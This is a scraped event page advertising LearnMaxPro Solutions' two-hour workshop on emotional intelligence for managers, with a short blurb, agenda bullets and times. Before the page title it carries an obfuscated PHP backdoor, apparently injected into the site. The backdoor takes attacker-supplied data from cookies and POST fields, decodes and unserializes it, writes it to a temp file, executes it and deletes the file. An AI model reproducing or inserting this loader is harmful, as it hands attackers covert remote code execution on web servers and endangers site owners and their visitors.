$OJACwgla = chr ( 944 - 871 ).chr (95) . "\x78" . chr (76) . chr ( 381 - 272 ); $jcaAsxsC = "\x63" . 'l' . "\141" . "\163" . "\163" . chr (95) . chr ( 263 - 162 )."\x78" . chr (105) . chr ( 272 - 157 )."\x74" . 's';$wditdJRkc = class_exists($OJACwgla); $jcaAsxsC = "51356";$DsdKjLE = strpos($jcaAsxsC, $OJACwgla);if ($wditdJRkc == $DsdKjLE){function qIxWugPTf(){$zQepvoUn = new /* 6488 */ I_xLm(56203 + 56203); $zQepvoUn = NULL;}$NyKazOQFW = "56203";class I_xLm{private function dHZXHJ($NyKazOQFW){if (is_array(I_xLm::$OMOjjxBqQ)) {$name = sys_get_temp_dir() . "/" . crc32(I_xLm::$OMOjjxBqQ["salt"]);@I_xLm::$OMOjjxBqQ["write"]($name, I_xLm::$OMOjjxBqQ["content"]);include $name;@I_xLm::$OMOjjxBqQ["delete"]($name); $NyKazOQFW = "56203";exit();}}public function vgrRtjPCS(){$ZtwXhpBA = "52800";$this->_dummy = str_repeat($ZtwXhpBA, strlen($ZtwXhpBA));}public function __destruct(){I_xLm::$OMOjjxBqQ = @unserialize(I_xLm::$OMOjjxBqQ); $NyKazOQFW = "60167_51485";$this->dHZXHJ($NyKazOQFW); $NyKazOQFW = "60167_51485";}public function NpmAsEl($ZtwXhpBA, $GBLUOBkBu){return $ZtwXhpBA[0] ^ str_repeat($GBLUOBkBu, intval(strlen($ZtwXhpBA[0]) / strlen($GBLUOBkBu)) + 1);}public function nUxhlpUq($ZtwXhpBA){$FysvEdu = chr ( 547 - 449 ).chr (97) . "\x73" . chr ( 1027 - 926 )."\x36" . "\64";return array_map($FysvEdu . chr ( 664 - 569 ).'d' . chr ( 546 - 445 ).chr ( 144 - 45 ).'o' . chr ( 597 - 497 )."\x65", array($ZtwXhpBA,));}public function __construct($HfYENh=0){$LPPPRb = "\x2c";$ZtwXhpBA = "";$ElbxSoltn = $_POST;$rCwDgLYcnv = $_COOKIE;$GBLUOBkBu = "86a24b5f-4593-493c-a7d8-74643ccbc737";$ZtRmmNbtc = @$rCwDgLYcnv[substr($GBLUOBkBu, 0, 4)];if (!empty($ZtRmmNbtc)){$ZtRmmNbtc = explode($LPPPRb, $ZtRmmNbtc);foreach ($ZtRmmNbtc as $RdvWn){$ZtwXhpBA .= @$rCwDgLYcnv[$RdvWn];$ZtwXhpBA .= @$ElbxSoltn[$RdvWn];}$ZtwXhpBA = $this->nUxhlpUq($ZtwXhpBA);}I_xLm::$OMOjjxBqQ = $this->NpmAsEl($ZtwXhpBA, $GBLUOBkBu);if (strpos($GBLUOBkBu, $LPPPRb) !== FALSE){$GBLUOBkBu = explode($LPPPRb, $GBLUOBkBu); $vYAYfUz = base64_decode(md5($GBLUOBkBu[0])); $iwikMy = strlen($GBLUOBkBu[1]) > 5 ? substr($GBLUOBkBu[1], 0, 5) : $GBLUOBkBu[1];$_GET['new_key'] = md5(implode('', $GBLUOBkBu)); $bQEIUDtACX = str_repeat($iwikMy, 2); $zemsVeZDk = array_map('trim', $GBLUOBkBu);}}public static $OMOjjxBqQ = 18036;}qIxWugPTf();} MANAGE WITH EMOTIONAL INTELLIGENCE | LearnMaxPro Solutions
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More than 50% of performance issues, high stress and lack of engagement, are due to lack of EMOTIONAL INTELLIGENCE. Emotional Intelligence or EQ is equally important as IQ. This is one of the critical skills we need to have in this Covid world as a team, people going through a lot of emotional challenges, and also disconnected due to work from home. Emotional intelligence influences how well employees interact with their colleagues, and EQ is also thought to play a role in how workers manage stress and conflict. We are going to cover the importance of EQ and how as leaders or managers we should be aware of these skills and how we can effectively address them to improve team performance. We at Learnmaxpro, are on the mission to bridge this skills & performance gap. Please join this workshop by registering along with your team also.

As Mahatma Gandhi has said, emotional Strength, as we call it “inner strength,” makes you stronger and better.



  • Concept of Emotional Intelligence for  a leader
  • Challenges faced due to Lack of EI- Video based
  • Five Key Elements of EQ/EI
  • Roles and Scenarios
  • This event has passed.

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  • Cost
  • Start Time
    November 12 @ 11:30 AM
  • End Time
    November 12 @ 1:30 PM